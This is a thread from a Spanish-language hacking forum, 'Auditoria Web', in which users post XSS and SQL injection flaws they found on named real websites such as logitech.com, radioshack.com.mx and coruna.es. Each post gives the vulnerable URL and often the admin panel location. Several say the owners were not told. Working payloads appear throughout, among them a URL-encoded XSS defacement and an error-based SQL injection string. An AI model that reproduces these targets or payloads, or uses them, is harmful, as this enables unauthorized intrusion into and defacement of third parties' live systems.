• Auditoria Web

  • Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
 #274800  por MichBukana
 
Avira:
Asociacion de asegurados de Vida y retiro de la republica argentina

no confundamos por favor.

y digo lo mismo no reporten cosas que no son suyas. tss que patetico, hay va mi aporte :O

Página: http://www.logitech.com
Bug:
Código: Seleccionar todo
http://www.logitech.com/es-es/search?q=%2F%27%22%3E%3Cbr%3E%3Cbr%3E%3Cstyle%3Ebody{background:black;}%3C/style%3E%3Ccenter%3E%3Ch1%3E%3Cfont%20
color=%22white%22%3EUn%20Enorme%20Saludo%20a%20la%20gente%20del%20Foro%20Indetectables.net%3Cp%3E%20by%20Michbukana!%20:O%3C/font%3E%3C/h1%3E
%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg%20src=%22http://img80.imageshack.us/img80/442/logologitech.th.png%22%20%20width=
%22320%22%20height=%22320%22%20/%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3C/font%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3
Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E
Método: XSS

Imagen
 #275964  por Skillmax
 
Web: http://www.freesound.org/

BUG: http://www.freesound.org/searchText.php ... /script%3E

Método: XSS

Descubridor: Skillmax/Enigmatic



- Ya apenas tengo tiempo para reportar fallos.. cuando saco 5 minutos intento hacer algo, creo que antes este bug existía y lo descubrió warvector pero fue parcheado, y otra vez, aparece..


Suerte, gente.
 #278308  por Spectrus
 
Web: http://www.metroid-database.com

Fallo: http://www.metroid-database.com/news-post.php?id=416

Método Utilizado: SQL Injection

Descubridor: SpectruS

Panel: http://www.metroid-database.com/admin

Otros comentarios: No reportado y es un foro.

__________________________________________________
Web: http://www.centraldev.net

Fallo: http://www.centraldev.net/post.php?id=50

Método Utilizado: SQL Injection

Descubridor: SpectruS

Panel: http://www.centraldev.net/admin
Otros comentarios: Sin reportar!
 #279178  por Skillmax
 
hdbreaker escribió:WEB: http://www.tuconfesion.com/

Link del error/archivo: http://www.tuconfesion.com/index.php?id='

Metodo Utilizado: SQL injection

Descubridor: HD_Breaker

Panel: http://www.tuconfesion.com/login.php

Estado: Reportado sin respuesta

Hola, hdbreaker, siento decirte que este bug ya lo encontré yo, anteriormente, lo posteé en la página 5 de este mismo post, gracias de todas maneras.

http://indetectables.net/foro/viewtopic ... 6&start=60


 #279390  por hdbreaker
 
Enigmatic escribió:
hdbreaker escribió:WEB: http://www.tuconfesion.com/

Link del error/archivo: http://www.tuconfesion.com/index.php?id='

Metodo Utilizado: SQL injection

Descubridor: HD_Breaker

Panel: http://www.tuconfesion.com/login.php

Estado: Reportado sin respuesta

Hola, hdbreaker, siento decirte que este bug ya lo encontré yo, anteriormente, lo posteé en la página 5 de este mismo post, gracias de todas maneras.

http://indetectables.net/foro/viewtopic ... 6&start=60


Disculpa no lo he visto de todas formas le viene bien otra advertencia ya q no ha hecho nada desde tu reporte... un abrazos
 #280250  por propa
 
WEB: http://www.coruna.es/

BUG: http://www.coruna.es/smbpc/noticias.php?id='

Metodo Utilizado: SQL injection

Descubridor: Propa

Panel: No encontrado

Estado: Reportado sin respuesta

=========================================

WEB: http://www.clublanus.com/

BUG: http://www.clublanus.com/noticias.php?id='

Metodo Utilizado: SQL injection

Descubridor: Propa

Panel: No encontrado

Estado: No Reportado
 #285722  por KHC
 
WEB: http://www.radioshack.com.mx/

BUG: http://www.radioshack.com.mx/subcate.php?IDSEC=%27

SQL Injection:
Código: Seleccionar todo
http://www.radioshack.com.mx/subcate.ph ... +row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)--+1
XSS Injection:
Código: Seleccionar todo
http://www.radioshack.com.mx/tiendas.php?CIUDAD='"--><script>alert(0x0000AA)</script>
Descubridor : Juh...

Metodo Utilizado: SQL Injection, XSS Injection, Encoding
  • 1
  • 8
  • 9
  • 10
  • 11
  • 12
  • 14